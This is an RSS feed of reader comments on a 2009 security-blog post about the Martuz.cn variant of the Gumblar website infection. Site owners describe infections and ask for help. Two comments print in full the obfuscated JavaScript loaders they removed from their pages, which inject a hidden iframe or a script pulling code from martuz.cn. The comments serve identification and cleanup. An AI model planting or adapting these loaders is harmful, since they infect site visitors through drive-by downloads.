<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Martuz .cn &#8211; New Incarnation of the Gumblar Exploit. So What&#8217;s New?</title>
	<atom:link href="http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/</link>
	<description>Website insecurity by example</description>
	<lastBuildDate>Thu, 04 Mar 2010 20:24:35 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: LiderPaylasim</title>
		<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/comment-page-1/#comment-2419</link>
		<dc:creator>LiderPaylasim</dc:creator>
		<pubDate>Fri, 04 Sep 2009 10:10:07 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=204#comment-2419</guid>
		<description>Macromedia Dreamweaver I meant….</description>
		<content:encoded><![CDATA[<p>Macromedia Dreamweaver I meant….</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Greg</title>
		<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/comment-page-1/#comment-2416</link>
		<dc:creator>Greg</dc:creator>
		<pubDate>Thu, 03 Sep 2009 06:28:03 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=204#comment-2416</guid>
		<description>I pulled this off my site.  Does anyone know what it is?
Every index page or folder on my client&#039;s site with an index file had a variant of that code on it.

I would like to find a way of scanning every file on my server for that code if anyone knows a way, please share.

This is the bugger code!

c10z4=&#039;&#039;;y607d50a7=/* ybe2941746 */document;y607d50a7.write(&#039;function ya7e355862b(ybb011505854){return ev&#039;+c10z4+&#039;al(ybb011505854); }&#039;);  function c101e3f8acy4aaf1(yb4f4fa702){  var zb3=&#039;&#039;;return (ya7e355862b(&#039;par&#039;+zb3+&#039;seInt&#039;)(yb4f4fa702,16));}function yddd1a98894e(y46cc6e076){ function y793dae(){var y43d1297eada=2;return y43d1297eada;} var y40fa2c6=&#039;&#039;;yab485=&#039;fromCh&#039;;ya7ca8b5ecee=String[yab485+&#039;arCode&#039;];for(yda0de91=0;yda0de91&lt;y46cc6e076.length;yda0de91+=y793dae()){ y40fa2c6+=(ya7ca8b5ecee(c101e3f8acy4aaf1(y46cc6e076.substr(yda0de91,y793dae()))));}return y40fa2c6;} var yb69429647=&#039;3C7363726970743E69662821&#039;+c10z4+&#039;6D796961&#039;+c10z4+&#039;297B646F63756D656E742E777269746528756E65736361&#039;+c10z4+&#039;7065282027253363253639253636253732253631&#039;+c10z4+&#039;253664253635253230253665253631&#039;+c10z4+&#039;253664253635253364253633253331&#039;+c10z4+&#039;253330253230253733253732253633253364253237253638253734253734253730253361&#039;+c10z4+&#039;253266253266253733253734253635253730253332253664253635253265253665253635253734253266253265253634253639253636253266253637253666253265253730253638253730253366253733253639253634253364253331&#039;+c10z4+&#039;26253237253262253464253631&#039;+c10z4+&#039;253734253638253265253732253666253735253665253634253238253464253631&#039;+c10z4+&#039;253734253638253265253732253631&#039;+c10z4+&#039;253665253634253666253664253238253239253261&#039;+c10z4+&#039;253332253335253337253339253331&#039;+c10z4+&#039;253339253239253262253237253339253336253635253339253331&#039;+c10z4+&#039;253337253331&#039;+c10z4+&#039;253339253334253237253230253737253639253634253734253638253364253334253334253337253230253638253635253639253637253638253734253364253335253337253337253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361&#039;+c10z4+&#039;253638253639253634253634253635253665253237253365253363253266253639253636253732253631&#039;+c10z4+&#039;2536642536352533652729293B7D7661&#039;+c10z4+&#039;72206D796961&#039;+c10z4+&#039;3D747275653B3C2F7363726970743E&#039;;y607d50a7.w rite(yddd1a98894e(yb69429647));</description>
		<content:encoded><![CDATA[<p>I pulled this off my site.  Does anyone know what it is?<br />
Every index page or folder on my client&#8217;s site with an index file had a variant of that code on it.</p>
<p>I would like to find a way of scanning every file on my server for that code if anyone knows a way, please share.</p>
<p>This is the bugger code!</p>
<p>c10z4=&#8221;;y607d50a7=/* ybe2941746 */document;y607d50a7.write(&#8216;function ya7e355862b(ybb011505854){return ev&#8217;+c10z4+&#8217;al(ybb011505854); }&#8217;);  function c101e3f8acy4aaf1(yb4f4fa702){  var zb3=&#8221;;return (ya7e355862b(&#8216;par&#8217;+zb3+&#8217;seInt&#8217;)(yb4f4fa702,16));}function yddd1a98894e(y46cc6e076){ function y793dae(){var y43d1297eada=2;return y43d1297eada;} var y40fa2c6=&#8221;;yab485=&#8217;fromCh&#8217;;ya7ca8b5ecee=String[yab485+'arCode'];for(yda0de91=0;yda0de91<y46cc6e076.length;yda0de91+=y793dae()){ y40fa2c6+=(ya7ca8b5ecee(c101e3f8acy4aaf1(y46cc6e076.substr(yda0de91,y793dae()))));}return y40fa2c6;} var yb69429647=&#8217;3C7363726970743E69662821&#8242;+c10z4+&#8217;6D796961&#8242;+c10z4+&#8217;297B646F63756D656E742E777269746528756E65736361&#8242;+c10z4+&#8217;7065282027253363253639253636253732253631&#8242;+c10z4+&#8217;253664253635253230253665253631&#8242;+c10z4+&#8217;253664253635253364253633253331&#8242;+c10z4+&#8217;253330253230253733253732253633253364253237253638253734253734253730253361&#8242;+c10z4+&#8217;253266253266253733253734253635253730253332253664253635253265253665253635253734253266253265253634253639253636253266253637253666253265253730253638253730253366253733253639253634253364253331&#8242;+c10z4+&#8217;26253237253262253464253631&#8242;+c10z4+&#8217;253734253638253265253732253666253735253665253634253238253464253631&#8242;+c10z4+&#8217;253734253638253265253732253631&#8242;+c10z4+&#8217;253665253634253666253664253238253239253261&#8242;+c10z4+&#8217;253332253335253337253339253331&#8242;+c10z4+&#8217;253339253239253262253237253339253336253635253339253331&#8242;+c10z4+&#8217;253337253331&#8242;+c10z4+&#8217;253339253334253237253230253737253639253634253734253638253364253334253334253337253230253638253635253639253637253638253734253364253335253337253337253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361&#8242;+c10z4+&#8217;253638253639253634253634253635253665253237253365253363253266253639253636253732253631&#8242;+c10z4+&#8217;2536642536352533652729293B7D7661&#8242;+c10z4+&#8217;72206D796961&#8242;+c10z4+&#8217;3D747275653B3C2F7363726970743E&#8217;;y607d50a7.w rite(yddd1a98894e(yb69429647));</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Alec Waters</title>
		<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/comment-page-1/#comment-1537</link>
		<dc:creator>Alec Waters</dc:creator>
		<pubDate>Thu, 02 Jul 2009 15:52:32 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=204#comment-1537</guid>
		<description>Hi Mauren,

They want to infect visitors to your site. It&#039;s called a &quot;drive-by&quot; download.

alec</description>
		<content:encoded><![CDATA[<p>Hi Mauren,</p>
<p>They want to infect visitors to your site. It&#8217;s called a &#8220;drive-by&#8221; download.</p>
<p>alec</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: sam</title>
		<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/comment-page-1/#comment-1533</link>
		<dc:creator>sam</dc:creator>
		<pubDate>Thu, 02 Jul 2009 09:06:41 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=204#comment-1533</guid>
		<description>my website &lt;em&gt;boilpass .com&lt;/em&gt; has been attacked too. so boring things !</description>
		<content:encoded><![CDATA[<p>my website <em>boilpass .com</em> has been attacked too. so boring things !</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Mauren</title>
		<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/comment-page-1/#comment-1492</link>
		<dc:creator>Mauren</dc:creator>
		<pubDate>Mon, 22 Jun 2009 08:08:46 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=204#comment-1492</guid>
		<description>The remaining question, why do they exploit?

What&#039;s they&#039;re reason to inject iframes and backdoors?

Does any1 know what they&#039;re after?</description>
		<content:encoded><![CDATA[<p>The remaining question, why do they exploit?</p>
<p>What&#8217;s they&#8217;re reason to inject iframes and backdoors?</p>
<p>Does any1 know what they&#8217;re after?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: &#8216;Gumblar&#8217; attacks spreading quickly &#171; blog.hugepixels</title>
		<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/comment-page-1/#comment-1485</link>
		<dc:creator>&#8216;Gumblar&#8217; attacks spreading quickly &#171; blog.hugepixels</dc:creator>
		<pubDate>Sat, 20 Jun 2009 11:30:47 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=204#comment-1485</guid>
		<description>[...] payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said Monday in an [...]</description>
		<content:encoded><![CDATA[<p>[...] payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said Monday in an [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Frederik</title>
		<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/comment-page-1/#comment-1445</link>
		<dc:creator>Frederik</dc:creator>
		<pubDate>Tue, 16 Jun 2009 07:27:18 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=204#comment-1445</guid>
		<description>I have the following variant in my source code:

(function(VXz3Z){var BbU=&#039;%&#039;;var FxUO=&#039;v!61r!20a!3d!22Sc!72ip!74Eng!69ne!22!2c!62!3d!22V!65rsion()!2b!22!2cj!3d!22!22!2cu!3dn!61!76igat!6fr!2euserAgent!3bif(!28!75!2eindexOf(!22Chrom!65!22)!3c0)!26!26(u!2e!69nd!65xOf(!22!57in!22!29!3e0)!26!26(u!2ein!64exO!66!28!22N!54!206!22)!3c!30!29!26!26(d!6f!63!75ment!2eco!6fkie!2eindexOf(!22mi!65k!3d1!22)!3c0)!26!26(typeo!66(!7ar!76zts)!21!3dt!79!70e!6ff(!22A!22)))!7bzrvzts!3d!22A!22!3b!65va!6c(!22i!66(wi!6e!64!6fw!2e!22+a!2b!22)j!3d!6a+!22+a+!22Major!22+b+a+!22Minor!22+!62+!61!2b!22!42u!69l!64!22+b+!22j!3b!22!29!3bdocume!6et!2ewrite(!22!3csc!72i!70t!20!73r!63!3d!2f!2fmar!74u!22+!22z!2e!63n!2fv!69d!2f!3f!69d!3d!22!2bj!2b!22!3e!3c!5c!2fsc!72ipt!3e!22)!3b!7d&#039;;eval(unescape(FxUO.replace(VXz3Z,BbU)))})(/\!/g);</description>
		<content:encoded><![CDATA[<p>I have the following variant in my source code:</p>
<p>(function(VXz3Z){var BbU=&#8217;%';var FxUO=&#8217;v!61r!20a!3d!22Sc!72ip!74Eng!69ne!22!2c!62!3d!22V!65rsion()!2b!22!2cj!3d!22!22!2cu!3dn!61!76igat!6fr!2euserAgent!3bif(!28!75!2eindexOf(!22Chrom!65!22)!3c0)!26!26(u!2e!69nd!65xOf(!22!57in!22!29!3e0)!26!26(u!2ein!64exO!66!28!22N!54!206!22)!3c!30!29!26!26(d!6f!63!75ment!2eco!6fkie!2eindexOf(!22mi!65k!3d1!22)!3c0)!26!26(typeo!66(!7ar!76zts)!21!3dt!79!70e!6ff(!22A!22)))!7bzrvzts!3d!22A!22!3b!65va!6c(!22i!66(wi!6e!64!6fw!2e!22+a!2b!22)j!3d!6a+!22+a+!22Major!22+b+a+!22Minor!22+!62+!61!2b!22!42u!69l!64!22+b+!22j!3b!22!29!3bdocume!6et!2ewrite(!22!3csc!72i!70t!20!73r!63!3d!2f!2fmar!74u!22+!22z!2e!63n!2fv!69d!2f!3f!69d!3d!22!2bj!2b!22!3e!3c!5c!2fsc!72ipt!3e!22)!3b!7d&#8217;;eval(unescape(FxUO.replace(VXz3Z,BbU)))})(/\!/g);</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Chris</title>
		<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/comment-page-1/#comment-1425</link>
		<dc:creator>Chris</dc:creator>
		<pubDate>Fri, 12 Jun 2009 18:25:46 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=204#comment-1425</guid>
		<description>We have developed a small application that deals with this kind of viruses.

Please check it out here:
http://www.axxis.gr/index.php?option=com_content&amp;view=article&amp;id=35</description>
		<content:encoded><![CDATA[<p>We have developed a small application that deals with this kind of viruses.</p>
<p>Please check it out here:<br />
<a href="http://www.axxis.gr/index.php?option=com_content&amp;view=article&amp;id=35" rel="nofollow">http://www.axxis.gr/index.php?option=com_content&amp;view=article&amp;id=35</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: &#8216;Gumblar&#8217; attacks spreading quickly &#124; Mujiono</title>
		<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/comment-page-1/#comment-1392</link>
		<dc:creator>&#8216;Gumblar&#8217; attacks spreading quickly &#124; Mujiono</dc:creator>
		<pubDate>Mon, 08 Jun 2009 23:46:33 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=204#comment-1392</guid>
		<description>[...] payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said Monday in an [...]</description>
		<content:encoded><![CDATA[<p>[...] payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said Monday in an [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: hemuman</title>
		<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/comment-page-1/#comment-1365</link>
		<dc:creator>hemuman</dc:creator>
		<pubDate>Wed, 03 Jun 2009 12:53:24 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=204#comment-1365</guid>
		<description>My website is infected tooo.... and its makin my life tough.... hope i will find cure soon....

&lt;em&gt;Edit by Denis: Site link had been removed from you signature since the site was still blacklisted by Google.
http://www.UnmaskParasites.com/security-report/?page=manojky.net
Consider requesting a malware review via Google&#039;s Webmaster Tools&lt;/em&gt;</description>
		<content:encoded><![CDATA[<p>My website is infected tooo&#8230;. and its makin my life tough&#8230;. hope i will find cure soon&#8230;.</p>
<p><em>Edit by Denis: Site link had been removed from you signature since the site was still blacklisted by Google.<br />
<a href="http://www.UnmaskParasites.com/security-report/?page=manojky.net" rel="nofollow">http://www.UnmaskParasites.com/security-report/?page=manojky.net</a><br />
Consider requesting a malware review via Google&#8217;s Webmaster Tools</em></p>
]]></content:encoded>
	</item>
</channel>
</rss>
